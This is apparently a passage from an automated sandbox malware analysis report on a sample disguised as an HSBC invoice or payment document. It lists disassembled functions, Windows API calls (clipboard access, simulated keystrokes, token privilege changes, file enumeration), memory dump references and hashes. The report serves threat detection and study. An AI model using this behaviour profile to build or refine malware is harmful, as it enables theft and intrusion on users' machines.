                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: ce4d43c0187b3eb251c6ee7cc1ccf72041cb1339467cc9feb3ef39b460eef218
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: 71B0927684020C7BDE012E82EC02A593F599B49678F808020FB1C2C162A673A6A09689
                    Function 00EED2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(00000002,00000000), ref: 00EED46A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: ErrorLast
                    • String ID:
                    • API String ID: 1452528299-0
                    • Opcode ID: 994fb8033c808013d029197cac9cd865752dae5efba0df7e8f9b11c82665fe6d
                    • Instruction ID: 794045f52fe53cc85e6f1a29a0147f9530408e347df1168428a6151a97e5a9fc
                    • Opcode Fuzzy Hash: 994fb8033c808013d029197cac9cd865752dae5efba0df7e8f9b11c82665fe6d
                    • Instruction Fuzzy Hash: 6A7172352083458FC714EF25C8D1A6AB7E0AF98714F14556DF49EAB2A2DB30ED09CB52
                    Function 00EA0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 2d6677e2d0cd8337bd09546360c4394c5fa96e62b14930fcfc13b390de096c57
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: 7131C170A001059FCB18DF58D480969F7A6FF5A304B64EAA5E409EF651D731EDC1DB80
                    Function 00E2229C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction ID: 407cecd9130654ceb6714f1c12cab1b78aabb2ed06f7fd2bf7e3d2e788b82706
                    • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                    • Instruction Fuzzy Hash: 61E0BF7594010EEFDB00EFA4D5496DE7BB4EF04311F1005A5FD05E7690DB319E548A62
                    Function 00E222A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 00E222B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272013729.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e20000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 5dca979045576233e8517a2e402af55edc5a88940a427eb1741c5e2b05b8b660
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 60E0E67594010EEFDB00EFB4D54969E7FB4EF04301F100165FD01E2290D6319D508A72

                    Non-executed Functions

                    Function 00F0CDAC Relevance: 68.9, APIs: 37, Strings: 2, Instructions: 637windowkeyboardnativeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00E82612: GetWindowLongW.USER32(?,000000EB), ref: 00E82623
                    • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 00F0CE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00F0CED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0CF00
                    • SendMessageW.USER32 ref: 00F0CF29
                    • _wcsncpy.LIBCMT ref: 00F0CFA1
                    • GetKeyState.USER32(00000011), ref: 00F0CFC2
                    • GetKeyState.USER32(00000009), ref: 00F0CFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00F0CFE5
                    • GetKeyState.USER32(00000010), ref: 00F0CFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00F0D018
                    • SendMessageW.USER32 ref: 00F0D03F
                    • SendMessageW.USER32(?,00001030,?,00F0B602), ref: 00F0D145
                    • SetCapture.USER32(?), ref: 00F0D177
                    • ClientToScreen.USER32(?,?), ref: 00F0D1DC
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0D203
                    • ReleaseCapture.USER32 ref: 00F0D20E
                    • GetCursorPos.USER32(?), ref: 00F0D248
                    • ScreenToClient.USER32(?,?), ref: 00F0D255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D2B1
                    • SendMessageW.USER32 ref: 00F0D2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D31C
                    • SendMessageW.USER32 ref: 00F0D34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00F0D36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00F0D37B
                    • GetCursorPos.USER32(?), ref: 00F0D39B
                    • ScreenToClient.USER32(?,?), ref: 00F0D3A8
                    • GetParent.USER32(?), ref: 00F0D3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 00F0D431
                    • SendMessageW.USER32 ref: 00F0D462
                    • ClientToScreen.USER32(?,?), ref: 00F0D4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00F0D4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 00F0D51A
                    • SendMessageW.USER32 ref: 00F0D53D
                    • ClientToScreen.USER32(?,?), ref: 00F0D58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00F0D5C3
                      • Part of subcall function 00E825DB: GetWindowLongW.USER32(?,000000EB), ref: 00E825EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 00F0D65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F
                    • API String ID: 302779176-4164748364
                    • Opcode ID: c820e9024f135bb0570d4a1ad7a5f1e61d0393c2710d95d01b38f32297214cc5
                    • Instruction ID: d0c9f227522888484f0c26746cbfb13e6f8ef33665f793e37113122bb624d6d2
                    • Opcode Fuzzy Hash: c820e9024f135bb0570d4a1ad7a5f1e61d0393c2710d95d01b38f32297214cc5
                    • Instruction Fuzzy Hash: 2742BB34604345AFDB21CF68C844BAABBE5FF49324F14062DFA99972E1C7319845FB92
                    Function 00F0804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00F0873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: b10e2d59693e2731eaf051a8666cf8baa605adc3862df093dd74d0edcfcb8969
                    • Instruction ID: c0ddcb42909fd4c2ffecbf32f8550b3db070e286716eab80214823d17f250fdc
                    • Opcode Fuzzy Hash: b10e2d59693e2731eaf051a8666cf8baa605adc3862df093dd74d0edcfcb8969
                    • Instruction Fuzzy Hash: 7412C271900208ABEB258F24CC49FAA7BF4EF497A0F144169F955EB2E1DF709946FB10
                    Function 00E9710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-2202602582
                    • Opcode ID: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                    • Instruction ID: 6e197104b9b3f1f8a6382eee662455844cd49278733b30b8c96cd713b0745e76
                    • Opcode Fuzzy Hash: bf2f2ed47a1fb01af05ee76deb2fc9c3e1cb5dda1eb798ee98067b5f2fa752e1
                    • Instruction Fuzzy Hash: 42938F75A002199BDF24CF68C881BADB7B1FF58314F25916BE955BB390E7709E82CB40
                    Function 00E84A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00E84A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EBDA8E
                    • IsIconic.USER32(?), ref: 00EBDA97
                    • ShowWindow.USER32(?,00000009), ref: 00EBDAA4
                    • SetForegroundWindow.USER32(?), ref: 00EBDAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00EBDAC4
                    • GetCurrentThreadId.KERNEL32 ref: 00EBDACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EBDAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 00EBDAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 00EBDAF8
                    • SetForegroundWindow.USER32(?), ref: 00EBDAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB10
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB25
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB33
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00EBDB42
                    • keybd_event.USER32(00000012,00000000), ref: 00EBDB47
                    • SetForegroundWindow.USER32(?), ref: 00EBDB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 00EBDB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                    • Instruction ID: 1888583dde6f162ba72e6313a87d5e1f03a11dfeca6baeb2bc2c3fe967453231
                    • Opcode Fuzzy Hash: 4a48492040696d2c880dbcd899a75879749ad76e3dc50d3ada39a00b4048c549
                    • Instruction Fuzzy Hash: C6316271A4031CBBEB316FA19C89FBF7E6CEB44B50F154025FA04EA1D0D6B15910BBA1
                    Function 00EF425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(00F0F910), ref: 00EF4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 00EF4292
                    • GetClipboardData.USER32(0000000D), ref: 00EF429A
                    • CloseClipboard.USER32 ref: 00EF42A6
                    • GlobalFix.KERNEL32(00000000), ref: 00EF42C2
                    • CloseClipboard.USER32 ref: 00EF42CC
                    • GlobalUnWire.KERNEL32(00000000), ref: 00EF42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 00EF42EE
                    • GetClipboardData.USER32(00000001), ref: 00EF42F6
                    • GlobalFix.KERNEL32(00000000), ref: 00EF4303
                    • GlobalUnWire.KERNEL32(00000000), ref: 00EF4337
                    • CloseClipboard.USER32 ref: 00EF4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatWire$Open
                    • String ID:
                    • API String ID: 941120096-0
                    • Opcode ID: 902e20bafed489eef60f1ca85f453e1c8c0b28279d1dd5cea91936b8559b0ca3
                    • Instruction ID: b5dc3ed942bb2065ff3e32cea066d7e9e5a714fc40ca34f6f8fb939c96886832
                    • Opcode Fuzzy Hash: 902e20bafed489eef60f1ca85f453e1c8c0b28279d1dd5cea91936b8559b0ca3
                    • Instruction Fuzzy Hash: DB519E75204209ABD310FF64DC86F7F77E8BB84B00F105529FA9AE21E1DB70D9099B62
                    Function 00ED8858 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00ED8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ED8D0D
                      • Part of subcall function 00ED8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ED8D3A
                      • Part of subcall function 00ED8CC3: GetLastError.KERNEL32 ref: 00ED8D47
                    • _memset.LIBCMT ref: 00ED889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00ED88ED
                    • CloseHandle.KERNEL32(?), ref: 00ED88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00ED8915
                    • GetProcessWindowStation.USER32 ref: 00ED892E
                    • SetProcessWindowStation.USER32(00000000), ref: 00ED8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00ED8952
                      • Part of subcall function 00ED8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00ED8851), ref: 00ED8728
                      • Part of subcall function 00ED8713: CloseHandle.KERNEL32(?,?,00ED8851), ref: 00ED873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 9c758d2685a753b7be3c069c87c5f309360fc29061cfc6a597f4547de6995f72
                    • Instruction ID: 87f99a0d29c8ed8d2bf6b74c4e36bb569dcb0faa58535188a741f4b2ee82a304
                    • Opcode Fuzzy Hash: 9c758d2685a753b7be3c069c87c5f309360fc29061cfc6a597f4547de6995f72
                    • Instruction Fuzzy Hash: E4814171900209AFDF11DFA4DD45AEEBBB8FF04308F08515AF920BA261DB718E15DB60
                    Function 00EEC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 00EEC9F8
                    • FindClose.KERNEL32(00000000), ref: 00EECA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00EECA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EECAAF
                    • __swprintf.LIBCMT ref: 00EECAFB
                    • __swprintf.LIBCMT ref: 00EECB3E
                      • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                    • __swprintf.LIBCMT ref: 00EECB92
                      • Part of subcall function 00EA38D8: __woutput_l.LIBCMT ref: 00EA3931
                    • __swprintf.LIBCMT ref: 00EECBE0
                      • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA3953
                      • Part of subcall function 00EA38D8: __flsbuf.LIBCMT ref: 00EA396B
                    • __swprintf.LIBCMT ref: 00EECC2F
                    • __swprintf.LIBCMT ref: 00EECC7E
                    • __swprintf.LIBCMT ref: 00EECCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                    • Instruction ID: 5a4198adccaa6cd97799ed22ede643735c95b484818e36ab1aaedba7bbadb255
                    • Opcode Fuzzy Hash: 18701ff3ec2d65abaa4760f7da346ba09d4df9a98f736048e53eda0575c74f0d
                    • Instruction Fuzzy Hash: 0FA15FB2508304ABC714FB64C985DAFB7ECFF94704F441929B58AE6192EB34DA09C762
                    Function 00EEF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,756E8FB0,?,00000000), ref: 00EEF221
                    • _wcscmp.LIBCMT ref: 00EEF236
                    • _wcscmp.LIBCMT ref: 00EEF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 00EEF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 00EEF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 00EEF291
                    • FindClose.KERNEL32(00000000), ref: 00EEF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00EEF2B8
                    • _wcscmp.LIBCMT ref: 00EEF2DF
                    • _wcscmp.LIBCMT ref: 00EEF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00EEF308
                    • SetCurrentDirectoryW.KERNEL32(00F3A5A0), ref: 00EEF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEF330
                    • FindClose.KERNEL32(00000000), ref: 00EEF33D
                    • FindClose.KERNEL32(00000000), ref: 00EEF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1272092983.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                    • Associated: 00000000.00000002.1272074376.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272092983.0000000000FAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272274093.0000000000FB2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1272311255.0000000000FB3000.00000004.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_e80000_HSBCscancopy-invoice778483-payment87476MT103.jbxd
                    Similarity
                    • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                    • String ID: *.*
                    • API String ID: 1803514871-438819550
                    • Opcode ID: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                    • Instruction ID: 8620b8b08cecb85b6ac0783c1c0ab7fedf78d9d477a69db8037cc0ef1158e1d5
                    • Opcode Fuzzy Hash: ecb01c9bd1726afdcaccbc2b539c689a56225ca3e42bb1322a9afacc21bf3f0f
                    • Instruction Fuzzy Hash: 8131E47660025D6ADF20DBB5DC48ADE73ACAF49364F141176F914F30A0EB30DA89DA50
                    Function 00F00AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                    Download Yara Rule
